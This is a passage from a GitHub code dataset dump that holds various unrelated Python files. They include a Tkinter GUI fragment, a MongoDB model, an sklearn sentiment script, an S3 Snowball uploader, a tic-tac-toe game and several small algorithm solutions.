win.deiconify()\n\n def adds(self):\n win = Toplevel()\n addsales.AddSales(win)\n self.window.withdraw()\n win.deiconify()\n \n def logout(self):\n win = Toplevel()\n signin.Signin(win)\n self.window.withdraw()\n win.deiconify()\n\ndef products():\n window = Tk()\n Products(window)\n window.mainloop()\n\nif __name__ == '__main__':\n products()","repo_name":"GbolahanAlaba/GLBL","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":9719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"33447955943","text":"from bson.objectid import ObjectId\nfrom .modal import Modal\n\n\nclass LoveModal(Modal):\n def __init__(self) -> None:\n super().__init__(collectionName=\"loves\", validator={\n '$jsonSchema': {\n 'bsonType': 'object',\n 'title': \"Loves Object Validation\",\n 'required': ['user_id', 'post_id'],\n 'properties': {\n 'user_id': {\n 'bsonType': 'string',\n 'description': \"'user_id' must be a string and is required\"\n },\n 'post_id': {\n 'bsonType': 'string',\n 'description': \"'post_id' must be a string and is required\"\n },\n }\n }\n })\n\n def readAll(self, userId: str):\n \"\"\"\n Return all the loves that a paticular user did\n :userId str: The id of the user\n :return: object\n \"\"\"\n data = self.collection.find({'user_id': userId})\n return data\n\n def readAllLoves(self, postId: str):\n \"\"\"\n Return all the loves on a paticular post\n :postId: The id of the post\n :return: object\n \"\"\"\n data = self.collection.find({'user_id': postId})\n return data\n\n def isUserLovedPost(self, userId: str, postId: str) -> bool:\n loveData = self.read({'user_id': userId, 'post_id': postId})\n if loveData is not None:\n return True\n return False\n","repo_name":"Uday-lal/insta_clone","sub_path":"server/model/loveModal.py","file_name":"loveModal.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"6685952785","text":"from sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.pipeline import Pipeline\r\nimport pickle\r\nimport mysql.connector\r\nimport json\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"\",\r\n database=\"project\"\r\n)\r\n\r\n## TOKENIZING\r\ncount_vect = CountVectorizer()\r\nfilobjek=open(\"sklearn_try/train_data\",'rb')\r\ntrain_data=pickle.load(filobjek)\r\nX_train_counts = count_vect.fit_transform(train_data)\r\n# print(train_data)\r\n\r\n## TF TRANSFORMER\r\nfilobjek=open(\"sklearn_try/train_count\",'rb')\r\ntrain_count=pickle.load(filobjek)\r\ntf_transformer = TfidfTransformer().fit(train_count)\r\n# print(train_count)\r\n\r\ntest_data=list()\r\nmycursor = mydb.cursor()\r\nmycursor.execute(\"SELECT * FROM data_crawling_baru\")\r\nmyresult = mycursor.fetchall()\r\nfor id_crawl,konten,id_tes in myresult:\r\n test_data.append(konten)\r\n\r\nfilobjek=open(\"sklearn_try/model_train\",'rb')\r\nclff=pickle.load(filobjek)\r\nX_new_counts = count_vect.transform(test_data)\r\nX_new_tf = tf_transformer.transform(X_new_counts)\r\npredicted = clff.predict(X_new_tf)\r\n\r\nsentimen=list()\r\nfor doc, category in zip(test_data, predicted):\r\n # print('%r => %s' % (doc, category))\r\n sentimen.append(category)\r\n\r\npos=0\r\nneg=0\r\nfor status in sentimen:\r\n if status==\"positif\":\r\n pos=pos+1\r\n elif status==\"negatif\":\r\n neg=neg+1\r\n\r\n\r\nhasil_sentimen={\"positif\":pos,\"negatif\":neg}\r\njson_sentimen=json.dumps(hasil_sentimen)\r\nprint(json_sentimen)","repo_name":"ahmadhafidh/analysis-of-sentiment-ranking-and-rating-apps","sub_path":"sklearn_try/try_new_datasentimen.py","file_name":"try_new_datasentimen.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"36802178816","text":"#-*- encoding: utf8 -*-\n'''\nstatus: failed\nversion: v11\nway: using multi-part uploading\nref: https://gist.github.com/teasherm/bb73f21ed2f3b46bc1c2ca48ec2c1cf5\nchangelog:\n - 2020.02.19\n - adding fifo operation to reducing for big file which is over max_part_size \n - removing tarfiles_one_time logic\n - spliting buffer by max_part_size\n - 2020.02.18:\n - supprt snowball limit:\n - max_part_size: 512mb\n - min_part_size: 5mb\n - 2020.02.14: \n - modifying for python3 \n - support korean in Windows\n - 2020.02.12: adding features \n - gen_filelist by size\n - 2020.02.10: changing filename from tar_to_s3_v7_multipart.py to snowball_uploader_8.py\n - adding features which can split tar file by size and count.\n - adding feature which create file list\n - showing help message\n'''\n\nimport boto3\nimport tarfile\nimport io\nimport os.path\nfrom datetime import datetime\nimport sys\nimport shutil\n\nbucket_name = \"your-own-dest-seoul\"\ns3 = boto3.client('s3', endpoint_url='https://s3.ap-northeast-2.amazonaws.com')\n#s3 = boto3.client('s3', region_name='ap-northeast-2', endpoint_url='https://s3.ap-northeast-2.amazonaws.com', aws_access_key_id=None, aws_secret_access_key=None)\n#tarfiles_one_time = 1000\nmax_size = 100 * 1000 ** 2 # 70GB\nmax_part_size = 20 * 1024 ** 2 # 100MB\nmin_part_size = 5 * 1024 ** 2 # 5MB\ntarget_path = '.' ## very important!! change to your source directory\nif os.name == 'nt':\n filelist_dir = \"C:/tmp/fl_logdir_dkfjpoiwqjefkdjf/\" #for windows\nelse:\n filelist_dir = '/tmp/fl_logdir_dkfjpoiwqjefkdjf/' #for linux\n\n#source_file = ''\n\n## Caution: you have to modify rename_file function to fit your own naming rule\n#def rename_file(org_file):\n# return org_file.replace('\\n','') + \"_new_buffer\"\n#org_files_list = open(source_file).readlines()\n#target_files_list = list(map(rename_file, org_files_list))\n## to use same name (org file name == target file name), uncomment below line\n#target_files_list = org_files_list\n\n#### don't need to modify from here\ncurrent_time = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n#key_name = ('snowball-batch-%s-%s.tar' % (source_file, current_time))\n#key_name = ('snowball-batch-%s.tar' % ( current_time))\n\nparts = []\n#s3_location = \"s3://\" + bucket_name + \"/\" + batch_tar\n\ndef gen_filelist():\n sum_size = 0\n fl_prefix = 'fl_'\n fl_index = 1\n shutil.rmtree(filelist_dir,ignore_errors=True)\n try:\n os.mkdir(filelist_dir)\n except: pass\n print('generating file list by size %s bytes' % max_size)\n for r,d,f in os.walk(target_path):\n for file in f:\n file_name = os.path.join(r,file)\n fl_name = filelist_dir + '/' + fl_prefix + str(fl_index) + \".txt\"\n sum_size = sum_size + os.path.getsize(file_name)\n if max_size < sum_size:\n fl_index = fl_index + 1 \n sum_size = 0\n print('%s' % file_name)\n with open(fl_name, 'a', encoding='utf8') as fl_content:\n fl_content.write(file_name + '\\n') \n print('file lists are generated!!')\n print('check %s' % filelist_dir)\n return os.listdir(filelist_dir)\n\n#def add_metadata_to_s3(bucket_name, key_name):\n# s3.copy_object(Key=key_name, Bucket=bucket_name,\n# CopySource={\"Bucket\": bucket_name, \"Key\": key_name},\n# Metadata={\"snowball-auto-extract\": \"true\"},\n# MetadataDirective=\"REPLACE\")\ndef log_error(org_file, str_suffix):\n with open(error_file,'a+', encoding='utf8') as err:\n err.write(org_file + str_suffix)\ndef log_success(target_file, str_suffix):\n with open(successlog_file,'a+', encoding='utf8') as success:\n success.write(target_file + str_suffix)\n\n#def flush_mem(out):\n# out.seek(0)\n# out.truncate()\n\ndef create_mpu():\n mpu = s3.create_multipart_upload(Bucket=bucket_name, Key=key_name, Metadata={\"snowball-auto-extract\": \"true\"})\n mpu_id = mpu[\"UploadId\"]\n return mpu_id\n\ndef upload_mpu(mpu_id, data, index):\n #part = s3.upload_part(Body=data, Bucket=bucket_name, Key=key_name, UploadId=mpu_id, PartNumber=index, ContentLength=max_buf_size)\n part = s3.upload_part(Body=data, Bucket=bucket_name, Key=key_name, UploadId=mpu_id, PartNumber=index)\n parts.append({\"PartNumber\": index, \"ETag\": part[\"ETag\"]})\n #print ('parts list: %s' % str(parts))\n return parts\n\ndef complete_mpu(mpu_id, parts):\n result = s3.complete_multipart_upload(\n Bucket=bucket_name,\n Key=key_name,\n UploadId=mpu_id,\n MultipartUpload={\"Parts\": parts})\n return result\n\ndef copy_to_snowball(org_files_list, target_files_list):\n recv_buf = io.BytesIO()\n mpu_id = create_mpu()\n parts_index = 1\n with tarfile.open(fileobj=recv_buf, mode=\"w\") as tar:\n for index in range(len(org_files_list)):\n org_file = org_files_list[index].replace('\\n','')\n target_file = target_files_list[index].replace('\\n','')\n print ('\\n########################')\n print ('0. program is starting')\n if os.path.isfile(org_file):\n tar.add(org_file, arcname=target_file)\n print ('1. %s is archiving\\n' % target_file )\n print ('1. recv_buf size: %s' % len(recv_buf.getvalue()))\n log_success(target_file, \" is archived successfully\\n\")\n ###################\n print ('%s is uploading\\n' % key_name )\n print (\"2. recv_buf pos: %s\" % recv_buf.tell())\n recv_buf_size = recv_buf.tell()\n cur_pos = 0\n if recv_buf_size > max_part_size:\n print('max file is checked')\n print('3.big recv_buf size: %s' % recv_buf_size)\n print('3.big recv_buf pos : %s' % recv_buf.tell())\n while recv_buf_size > max_part_size:\n print('4.sending big : %s' % recv_buf.tell())\n recv_buf.seek(0,0)\n mpu_parts = upload_mpu(mpu_id, recv_buf.read(max_part_size), parts_index)\n parts_index += 1\n print('4.sent big : %s' % recv_buf.tell())\n tmp_buf = io.BytesIO() # added for FIFO operation\n tmp_buf.write(recv_buf.read()) # added for FIFO operation\n print('4.moved recv to tmp')\n recv_buf = tmp_buf\n #cur_pos = cur_pos + max_part_size + 1\n print('4.1.big recv_buf pos: %s' % recv_buf.tell())\n print('4.2.big recv_buf size: %s' % len(recv_buf.getvalue()))\n recv_buf_size = recv_buf.tell()\n if recv_buf_size >= min_part_size:\n recv_buf.seek(0,0)\n print('5.sending big-small peek : %s' % recv_buf.peek())\n mpu_parts = upload_mpu(mpu_id, recv_buf.read(max_part_size), parts_index)\n parts_index += 1\n recv_buf.truncate(0)\n print('5.big-small recv_buf size: %s' % len(recv_buf.getvalue()))\n print('5.big-small recv_buf pos : %s' % recv_buf.tell())\n else:\n print('6 remaining buf of big is %s' % recv_buf_size )\n #spared_buf_size = recv_buf_size\n #pass\n else:\n #if spared_buf_size:\n # cur_pos = spared_buf_size * -1\n if recv_buf_size < min_part_size:\n print('7. normal recev buffer should be passed')\n print('7.1 recv_buf size: %s' % len(recv_buf.getvalue()))\n print('7.2 recv_buf pos : %s' % recv_buf.tell())\n #recv_buf.seek(0,0)\n #mpu_parts = upload_mpu(mpu_id, recv_buf.read(), parts_index)\n #parts_index += 1\n #recv_buf.seek(0)\n #recv_buf.truncate(0)\n ###################\n else:\n log_error(org_file,\" does not exist\\n\")\n print (org_file + ' is not exist...............................................\\n')\n print (\"8. final recv_buf size: \" + str(len(recv_buf.getvalue())))\n print('8.1 final recv_buf pos : %s' % recv_buf.tell())\n recv_buf.seek(0,0)\n mpu_parts = upload_mpu(mpu_id, recv_buf.read(), parts_index)\n parts_index += 1\n print (\"8. %s is uploaded\" % key_name)\n complete_mpu(mpu_id, mpu_parts)\n ### print metadata\n meta_out = s3.head_object(Bucket=bucket_name, Key=key_name)\n print ('\\n\\n metadata info: %s' % str(meta_out)) \n log_success(str(meta_out), '!!\\n')\n print (\"\\n\\n tar file: %s\" % key_name)\n log_success(key_name, ' is uploaded successfully\\n')\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print (\"Usage: %s genlist | cp_snowball | help\" % sys.argv[0]) \n sys.exit()\n elif sys.argv[1] == \"genlist\":\n gen_filelist()\n elif sys.argv[1] == \"cp_snowball\":\n source_files = os.listdir(filelist_dir)\n for sf in source_files:\n error_file = ('error_%s_%s.log' % (sf, current_time))\n successlog_file = ('success_%s_%s.log' % (sf, current_time))\n source_file = os.path.join(filelist_dir, sf)\n org_files_list = open(source_file, encoding='utf8').readlines()\n target_files_list = org_files_list\n #line_break = int(len(org_files_list) / tarfiles_one_time + 1)\n #final_line_list = [ i*int(tarfiles_one_time)-1 for i in range(1,line_break)]\n #final_line_list.append(len(org_files_list)-1)\n key_name = ('snowball-%s-%s.tar' % (sf[:-4], current_time))\n copy_to_snowball(org_files_list, target_files_list)\n parts = []\n else:\n print (\"Usage: %s 'genlist | cp_snowball | help'\" % sys.argv[0])\n","repo_name":"hatsari/article","sub_path":"aws/s3_snowball/working/snowball_uploader_13_almost_success.py","file_name":"snowball_uploader_13_almost_success.py","file_ext":"py","file_size_in_byte":10032,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"38"}
+{"seq_id":"28140688163","text":"import sympy\n\nfrom numpy import array as array\nfrom numpy import mat as mat\nfrom numpy import zeros as zeros\nfrom numpy.linalg import det as det\n\nfrom math import sqrt as sqrt\n\nnum_term = 3\n\na = sympy.symarray(\"a\",num_term)\nb = sympy.symarray(\"b\",num_term)\n\nr,s = sympy.symbols(\"r, s\")\nmonomials = array([1,r,s])\n\nert = a.dot(monomials)\nest = b.dot(monomials)\neqt = sqrt(0.5)*(est-ert)\n\nnum_equation = 6\neq_array = sympy.symarray(\"temp\", num_equation)\n\neq_array[0] = ert.subs([(r,0), (s,0)])\neq_array[1] = ert.subs([(r,1), (s,0)])\neq_array[2] = est.subs([(r,0), (s,0)])\neq_array[3] = est.subs([(r,0), (s,1)])\neq_array[4] = eqt.subs([(r,1), (s,0)])\neq_array[5] = eqt.subs([(r,0), (s,1)])\n\n\nnum_variable = a.size + b.size\n\nx = sympy.symarray(\"temp\", num_variable)\nfor i in range(0, a.size):\n x[i] = a[i]\nfor i in range(0, b.size):\n x[i + a.size] = b[i]\n\nA = mat(zeros((num_equation,num_variable)))\nfor i in range (0,num_equation) : \n eq = eq_array[i] \n for j in range (0, num_variable) :\n target_variable = x[j]\n A[i, j] = eq.coeff(target_variable)\n\nprint(det(A))\n\n# mrt, mst, mqt = sympy.symbols(\"mrt, mst, mqt\")\n# b = array([mrt, mrt, mst, mst, mqt, mqt])\n# b = mat(b).T\n\n# x = A.I * b\n# print(x)\n\n\n\n\n\n# er1,es2,er3,es3 = sympy.symbols(\"er1 es2 er3 es3\")\n\n# c = sqrt(0.5)\n\n# A = mat(\n# [[1, 0, 0, 0, 0, 0],\n# [1, 1, 0, 0, 0, 0],\n# [0, 0, 0, 1, 0, 0],\n# [0, 0, 0, 1, 0, 1], \n# [-c, -c, 0, c, c, 0],\n# [-c, 0, -c, c, 0, c]\n# ])\n\n# A_inv = inv(A)\n\n# b = mat([[er1],[er1],[es2],[es2],[c*(es3-er3)],[c*(es3-er3)]])\n\n# print(A_inv * b)","repo_name":"rla523at/Study","sub_path":"code/Python/2004_(Lee_&_Bathe)/MITC3.py","file_name":"MITC3.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"74844206830","text":"from plotutils import *\nfrom vidutils import load_video_frames, get_face_probs\nfrom audioutils import get_audio_probs\nfrom tensorflow import keras\nimport joblib\nimport numpy as np\nimport argparse\nimport os\nimport warnings\n\n\ndef get_current_aud_prob(ts, aud_probs):\n for key in aud_probs:\n if ts >= key:\n return aud_probs[key]\n\n\ndef get_vid_probs(aud_probs, face_probs, timestamps, theta=.5):\n vid_probs = []\n for ts, face_prob in zip(timestamps, face_probs):\n aud_prob = get_current_aud_prob(ts, aud_probs)\n if face_prob is not None:\n vid_probs.append(theta * face_prob + (1-theta) * aud_prob)\n else:\n vid_probs.append(aud_prob)\n return vid_probs\n\n\ndef main(vidpath, resultspath, resultname):\n vmodel = keras.models.load_model('assets/keras_vgg19_84acc.h5')\n amodel = joblib.load('assets/audio_mlp_classifier.joblib')\n frames, faces, timestamps = load_video_frames(vidpath, skip=10)\n face_probs = get_face_probs(vmodel, faces)\n aud_probs = get_audio_probs(amodel, vidpath)\n print('aud_probs', aud_probs)\n print('face_probs', face_probs)\n probs = get_vid_probs(aud_probs, face_probs, timestamps) # [.2, .3, ...]\n leveled_probs = smooth_probs(probs, 3, 1)\n title = get_basename(vidpath)\n savepath = os.path.join(resultspath, resultname or title)\n tsplot(timestamps, probs, savepath + '.jpg')\n show_frames(probs, frames, savepath + '_frames.png')\n tsjson(timestamps, leveled_probs, savepath + '.json')\n\n\n# get vidpath, resultspath from command line if provided, else default\ndef parseargs():\n parser = argparse.ArgumentParser(\n description='Demo for shouting action recognition in videos.')\n parser.add_argument('--vidpath', help='The path to an .mp4 file.')\n parser.add_argument(\n '--resultspath', help='The path to a folder to store the results of analysis.')\n parser.add_argument(\n '--resultname', help='The base name of the result files to be generated. If none, use vidname.')\n args = parser.parse_args()\n vidpath = args.vidpath or './videos/demo.mov'\n resultspath = args.resultspath or './results'\n resultname = args.resultname or None\n return vidpath, resultspath, resultname\n \n\n\nif __name__ == '__main__':\n vidpath, resultspath, resultname = parseargs()\n assert os.path.exists(vidpath), 'Video path does not exist'\n assert os.path.exists(resultspath), 'Results path does not exist'\n main(vidpath, resultspath, resultname)\n","repo_name":"josiahcoad/ActionRecognition","sub_path":"demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"39658506898","text":"#!/usr/bin/env python\n\ndef longestCommonSubsequence(text1: str, text2: str) -> int:\n m = len(text1) \n n = len(text2)\n dp = [[0 for i in range(n + 1)] for j in range(m + 1)]\n\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if text1[i - 1] == text2[j - 1]:\n dp[i][j] = dp[i - 1][j - 1] + 1\n else:\n dp[i][j] = max(dp[i - 1][j], dp[i][j - 1])\n \n return dp[-1][-1]\n\nif __name__ == '__main__':\n x = \"abcde\"\n y = \"ace\"\n print(\"The longest common subsequence length of the input strings is: \")\n print(longestCommonSubsequence(x, y))","repo_name":"ymtowya/CS5800-code","sub_path":"assign9/as9_1.py","file_name":"as9_1.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"11499610944","text":"from types import SimpleNamespace\n\n\ndef get_default_configs():\n cfg = SimpleNamespace(**{})\n cfg.model_dir = 'models/'\n\n cfg.device = 'cuda:0'\n cfg.batch_size = 32\n cfg.num_workers = 4\n cfg.base_lr = 5e-5\n cfg.warmup_factor = 10\n cfg.num_epochs = 50\n cfg.folds_to_run = [0]\n cfg.patience = 10\n cfg.seed = 67\n cfg.amp = True\n\n cfg.ver_note = 'v1'\n cfg.sample = None\n\n cfg.backbone = 'tf_efficientnet_b3_ns'\n cfg.backbone_pretrained = True\n\n return cfg\n","repo_name":"gallegi/AnyCV","sub_path":"commons/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"38102664538","text":"\"\"\" Valid Mountain Array\nGiven an array of integers arr, return true if and only if it is a valid mountain array.\n\nRecall that arr is a mountain array if and only if:\n\narr.length >= 3\nThere exists some i with 0 < i < arr.length - 1 such that:\narr[0] < arr[1] < ... < arr[i - 1] < arr[i]\narr[i] > arr[i + 1] > ... > arr[arr.length - 1]\n\n##### Solution\nWe can use two pointers for this problem one starting from left and one from right. We loop over the entire array\nand increase the left index when arr[left+1]>index[left] and decrease the right index by one when arr[right-1]>index[right].\nAt the end when left is equal to right and both are not zero, it is a valid mountain array. We do not want\neither left or right to be zero at the end because it means that the values did not increase.\n\"\"\"\n\n\nclass Solution:\n def validMountainArray(self, arr) -> bool:\n # start a left pointer and a right pointer\n left, right = 0, len(arr) - 1\n # loop over each element in the array\n for i in range(len(arr)):\n # if the array is increasing from left, increase the left by one\n if arr[left + 1] > arr[left]:\n left += 1\n # if the array is increasing from right, decrease the right by one\n if arr[right - 1] > arr[right]:\n right -= 1\n # if left and right are the same and are not zero, it is a valid mountain\n return left == right and not (left == 0 or right == 0)","repo_name":"RustamyF/data-structure-Python","sub_path":"src/algostructure/arrays/code/valid_mountain.py","file_name":"valid_mountain.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"37324235096","text":"from random import randrange\n\n\ndef DisplayBoard(board):\n#\n# the function accepts one parameter containing the board's current status\n# and prints it out to the console\n# \n print('+-------+-------+-------+')\n print('| | | |')\n print('| {} | {} | {} |'.format(board[0][0],board[0][1],board[0][2]))\n print('| | | |')\n print('+-------+-------+-------+')\n print('| | | |')\n print('| {} | {} | {} |'.format(board[1][0],board[1][1],board[1][2]))\n print('| | | |')\n print('+-------+-------+-------+')\n print('| | | |')\n print('| {} | {} | {} |'.format(board[2][0],board[2][1],board[2][2]))\n print('| | | |')\n print('+-------+-------+-------+')\n\n\ndef EnterMove(board):\n#\n# the function accepts the board current status, asks the user about their move, \n# checks the input and updates the board according to the user's decision\n#\n free_squares = MakeListOfFreeFields(board)\n user = int(input('Select the Box to mark : '))\n if 0 < user <10:\n if free_squares[user-1] == 'R':\n print('Box alreay Occopied. Select another')\n else:\n i,j = free_squares[user-1]\n board[i][j] = 'O'\n return board \n\n\ndef MakeListOfFreeFields(board):\n#\n# the function browses the board and builds a list of all the free squares; \n# the list consists of tuples, while each tuple is a pair of row and column numbers\n#\n free_squares = list()\n for i in range(3):\n for j in range(3):\n if board[i][j] == 'X' or board[i][j] == 'O':\n free_squares.append('R')\n else:\n free_squares.append((i,j))\n #print(free_squares)\n return free_squares\n\n\ndef VictoryFor(board, sign):\n#\n# the function analyzes the board status in order to check if \n# the player using 'O's or 'X's has won the game\n# \n check = True\n count = 0\n\n combinations = [\n [(0,0),(0,1),(0,2)],\n [(1,0),(1,1),(1,2)],\n [(2,0),(2,1),(2,2)],\n [(0,0),(1,0),(2,0)],\n [(0,1),(1,1),(2,1)],\n [(0,2),(1,2),(2,2)],\n [(0,0),(1,1),(2,2)],\n [(0,2),(1,1),(2,0)]\n ]\n\n for row in combinations:\n for pair in row:\n i,j = pair\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n count = 0\n\n if check == False and sign == 'X':\n print('Computer Won!')\n elif check == False and sign == 'O':\n print('You Won!')\n return check\n \n \"\"\"\n #check Rows\n for i in range(3):\n for j in range(3):\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n #check Columns\n for i in range(3):\n for j in range(3):\n if board[j][i] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n\n #check left middles\n for i in range(3):\n for j in range(i,i+1):\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n\n #check Right middles\n \n for i in range(2,-1,-1):\n for j in range():\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n\"\"\"\n \ndef DrawMove(board):\n#\n# the function draws the computer's move and updates the board\n#\n if type(board[1][1]) == int:\n board[1][1] = 'X'\n else:\n free_squares = MakeListOfFreeFields(board)\n while True:\n comp = randrange(10)\n if free_squares[comp-1] == 'R':\n continue\n else:\n i,j = free_squares[comp-1]\n board[i][j] = 'X'\n return board\n return board\n \n\ndef main():\n count = 0\n board = [[1,2,3],[4,5,6],[7,8,9]]\n check = True \n while check and count < 4: \n board = DrawMove(board)\n check = VictoryFor(board, 'X')\n DisplayBoard(board)\n \n #if computer win no need to take user input so use continue\n if check == False:\n continue\n board = EnterMove(board)\n check = VictoryFor(board, 'O')\n \n #if use wins dispaly the Board\n if check == False:\n DisplayBoard(board)\n count +=1 \n \n #if no one wins and turns completed then display the board\n if count == 4:\n DisplayBoard(board)\n \nif __name__ == \"__main__\":\n main()\n\n","repo_name":"SnRahman/MY-Codes","sub_path":"tic_toc_toe.py","file_name":"tic_toc_toe.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"26177074158","text":"import unittest\n\nimport dwd\n\n\nclass DWDTest(unittest.TestCase):\n def testFormatStationFilename(self):\n formatted_string = dwd.format_station_filename(\"00001\")\n self.assertEqual(\"tageswerte_KL_00001_\", formatted_string)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Dens49/dwd-weather-stats","sub_path":"dwd_test.py","file_name":"dwd_test.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"18699581623","text":"from sklearn.preprocessing import MinMaxScaler\nfrom sklearn.datasets import load_iris\n\ndata = load_iris().data\nmms_transfer = MinMaxScaler()\n\"\"\"\n标准化公式:x' = (x-min) / (max-min)\n-------------下面介绍一下几个MinMaxScaler()对象的常用方法-------------\nfit(): 代入数据训练模型\nfit_transform(): 先使用fit的方法,在使用transform的方法,即把数据放入后直接返回标准化后的数据\n\n- 在进行.fit()之后,可以调用以下方法:\n.data_max_: 每个特征的最大值\n.data_min_: 每个特征的最小值\ntransform: 利用训练好的标准化模型对数据集进行标准化\nget_params: 获取模型的参数\ninverse_transform: 逆标准化,即将标准化后的数据集变为原来未处理的形式\n\"\"\"\nmms_transfer.fit(data) # 代入数据训练模型\nprint(f\"数据集每个特征的最大值为:{mms_transfer.data_max_}\")\nprint(f\"数据集每个特征的最小值为:{mms_transfer.data_min_}\")\nprint(f\"标准化的参数为:{mms_transfer.get_params()}\")\ndata_mms = mms_transfer.transform(data) # 用训练好的模型对数据进行标准化\n\n# 如果只需要对数据进行标准化,以下步骤更为简洁:\nmms_transfer = MinMaxScaler()\ndata_transfer = mms_transfer.fit_transform(data) # 调用标准化模型,将数据转化\nprint(f\"标准化后的数据为:{data_transfer}\")\n","repo_name":"Korcat/Machine_Learning","sub_path":"数据预处理/离差标准化.py","file_name":"离差标准化.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"23068109348","text":"import numpy as np\ndef shift(x, k, l, boundary):\n if x.ndim == 2:\n color = 1\n else :\n color = 3\n n1 = np.shape(x)[0]\n n2 = np.shape(x)[1]\n xshifted = np.zeros((n1,n2,color))\n irange = np.mod(np.arange(n1) + k, n1)\n jrange = np.mod(np.arange(n2) + l, n2)\n # firstly move upward then move rightward\n xshifted = x[irange, :][:, jrange]\n if boundary == 'periodical':\n pass\n elif boundary is 'extension':\n m = n1 - k if k > 0 else -k-1\n n = n2 - l if l > 0 else -l-1\n if k != 0:\n xshifted[m::np.sign(k),:,:] = np.tile(xshifted[m-np.sign(k):m-np.sign(k)+1,:,:],(np.sign(k)*k,1,1))\n if l != 0:\n xshifted[:,n::np.sign(l),:] = np.tile(xshifted[:,n-np.sign(l):n-np.sign(l)+1,:],(1,np.sign(l)*l,1))\n elif boundary == 'zero-padding':\n period = xshifted\n xshifted = np.zeros_like(period)\n m = n1 - k if k > 0 else -k-1\n n = n2 - l if l > 0 else -l-1 \n sign_k = np.sign(k) if k != 0 else 1 \n sign_l = np.sign(l) if l != 0 else 1\n if k == 0:\n m = n1\n if l == 0:\n n = n2\n xshifted[:m:sign_k,:n:sign_l,:] = period[:m:sign_k,:n:sign_l,:]\n # mirror\n else:\n m = n1 - k if k > 0 else -k\n n = n2 - l if l > 0 else -l\n add_k = 1 if k < 0 else 0\n add_l = 1 if l < 0 else 0\n if k != 0:\n xshifted[m::np.sign(k),:,:] = xshifted[min(m,m-k):max(m,m-k) + add_k,:,:][::-np.sign(k),:,:]\n if l != 0:\n xshifted[:,n::np.sign(l),:] = xshifted[:,min(n,n-l):max(n,n-l) + add_l ,:][:,::-np.sign(l),:]\n return xshifted\n","repo_name":"shoachia/nlmeans","sub_path":"shift.py","file_name":"shift.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"9158407173","text":"import os\nfrom pdfProcess import list_reform\nfrom pdfProcess import testclip\n\n\ndef zhihmulu2txt(path):\n f = open(path+\"re.zhi2txt1\", encoding=\"utf-8\")\n f2 = open(path+\"re.zhi2txt2\", \"w\", encoding=\"utf-8\")\n linelist = f.readlines()\n for line in linelist:\n if line[0] == \"угг\":\n f2.write(\"# \"+line+\"\\n\")\n f2.write(line+\"\\n\")\n f.close\n f2.close()\n\n\nif __name__ == '__main__':\n path = os.getcwd()+\"/\"\n testclip.copy_text_from_clip(path, \"zhi2txt1\")\n zhihmulu2txt(path)\n","repo_name":"jiangnanqw12/testCode","sub_path":"004_text_process/zhi2txt.py","file_name":"zhi2txt.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"32813618881","text":"# 제목 : 동전 1\n# 분류 : DP, Gold 5\n# 출처 : 백준 2293\n\nn, k = map(int, input().split())\ncoin = [int(input()) for _ in range(n)]\n\ndp = [0] * (k+1)\ndp[0] = 1\n\nfor c in coin:\n for i in range(c, k+1):\n dp[i] += dp[i - c]\n\nprint(dp[k])","repo_name":"41ow1ives/1day2solve","sub_path":"kyounghyeon/BOJ/DP/2293.py","file_name":"2293.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"}
